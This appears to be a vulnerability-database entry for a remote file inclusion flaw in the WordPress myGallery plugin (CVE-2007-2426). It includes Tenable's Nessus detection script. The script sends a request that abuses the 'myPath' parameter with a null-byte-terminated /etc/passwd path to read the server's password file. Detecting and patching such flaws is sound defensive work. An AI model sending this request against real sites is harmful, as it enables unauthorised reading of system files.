myGallery mygallerybrowser.php 'myPath' Parameter Remote File Inclusion

🗓️ 30 Apr 2007 00:00:00Reported by TenableType

myGallery mygallerybrowser.php 'myPath' Parameter Remote File Inclusion Vulnerability in WordPres

Reporter	Title	Published	Views	Family All 10
CVE	CVE-2007-2426	2 May 200700:00	–	cve
Cvelist	CVE-2007-2426	2 May 200700:00	–	cvelist
EUVD	EUVD-2007-2421	7 Oct 202500:30	–	euvd
canvas	Immunity Canvas: MYGALLERY_REMOTE	2 May 200700:19	–	canvas
NVD	CVE-2007-2426	2 May 200700:19	–	nvd
Patchstack	WordPress myGallery Plugin <= 1.4 - Remote File Inclusion	1 May 200700:00	–	patchstack
Prion	Remote file inclusion	2 May 200700:19	–	prion
VulnCheck KEV	VulnCheck KEV: CVE-2007-2426	29 Apr 200700:00	–	vulncheck_kev
wpexploit	myGallery <= 1.4b4 - Unauthenticated File Inclusion	29 Apr 200700:00	–	wpexploit
WPVulnDB	myGallery <= 1.4b4 - Unauthenticated File Inclusion	29 Apr 200700:00	–	wpvulndb

Source	Link
wildbits	www.wildbits.de/2007/04/29/sicherheitsluecke-in-mygallery/
cve	www.cve.mitre.org/cgi-bin/cvename.cgi

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(25116);
  script_version("1.22");
  script_set_attribute(attribute:"plugin_modification_date", value:"2025/05/14");

  script_cve_id("CVE-2007-2426");
  script_bugtraq_id(23702);
  script_xref(name:"EDB-ID", value:"3814");

  script_name(english:"myGallery mygallerybrowser.php 'myPath' Parameter Remote File Inclusion");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
remote file include vulnerability.");
  script_set_attribute(attribute:"description", value:
"The third-party myGallery module for WordPress installed on the remote
host fails to sanitize input to the 'myPath' parameter of the
'/mygallery/myfunctions/mygallerybrowser.php' script before using it
to include PHP code. An unauthenticated attacker can exploit this
issue to view arbitrary files on the remote host or possibly to
execute arbitrary PHP code, perhaps from third-party hosts.

Note that exploitation of this issue does not require that PHP's
'register_globals' setting be enabled.");
  script_set_attribute(attribute:"see_also", value:"https://www.wildbits.de/2007/04/29/sicherheitsluecke-in-mygallery/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to myGallery version 1.4b5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:W/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/04/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/04/30");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2025 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

plugin = "myGallery";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  path = "/wp-content/plugins/";
  checks[path + "mygallery/languages/myGallery.pot"][0] =
    make_list('myGallery', 'mygalleryoptions\\.php');

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}
if (!installed)
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

# Try to retrieve a local file.
file = "/etc/passwd";
w = http_send_recv3(
  method:"GET",
  item:dir + "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?" +
    "myPath=" + file + "%00",
  port:port,
  exit_on_fail:TRUE
);
res = w[2];

# There's a problem if...
if
(
    # there's an entry for root or...
    egrep(pattern:"root:.*:0:[01]:", string:res) ||
    # we get an error saying "failed to open stream" or...
    "main(" + file + "\\0/wp-config.php): failed to open stream" >< res ||
    # we get an error claiming the file doesn't exist or...
    "main(" + file + "): failed to open stream: No such file" >< res ||
    # we get an error about open_basedir restriction.
    "open_basedir restriction in effect. File(" + file >< res
)
{
  contents = NULL;
  if (egrep(string:res, pattern:"root:.*:0:[01]:"))
  {
    contents = res;
    contents = contents - strstr(contents, "<br");
  }

  if (contents && egrep(string:contents, pattern:"root:.*:0:[01]:"))
  {
    contents = data_protection::redact_etc_passwd(output:contents);
    if (report_verbosity > 0)
    {
      report =
        "Here are the contents of the file '/etc/passwd' that Nessus was" +
        '\n' + 'able to read from the remote host :\n' +
        '\n' + contents;
      security_hole(port:port, extra:report);
    }
  }
  else security_hole(port);
  exit(0);
}
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin");

14 May 2025 00:00Current

6Medium risk

Vulners AI Score6

CVSS 27.5

EPSS0.02221